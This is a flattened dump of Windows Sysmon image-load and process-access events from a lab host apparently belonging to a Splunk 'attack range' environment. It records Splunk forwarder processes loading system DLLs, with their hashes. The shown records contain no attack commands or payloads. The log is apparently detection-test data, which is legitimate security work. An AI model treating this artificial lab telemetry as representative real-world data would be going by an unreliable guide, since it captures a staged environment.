Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 
734700x800000000000000098635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating 
SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27,IMPHASH=B01B7830101BC0D5FBDE4FFE2B170CF7trueMicrosoft WindowsValid 734700x800000000000000098631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x800000000000000098629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728B,IMPHASH=98738BA55485CCA932F6D222F47FFC55trueMicrosoft WindowsValid 
734700x800000000000000098628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9,IMPHASH=3C043C6FF0F62DAEB8819606F79C5ECCtrueMicrosoft WindowsValid 734700x800000000000000098627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000098625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 10341000x800000000000000098622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52trueSplunk, Inc.Valid 10341000x800000000000000098617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:03:46.874{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:03:46.874{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.890{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.890{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000098818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API 
DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 
734700x800000000000000098811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.718{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
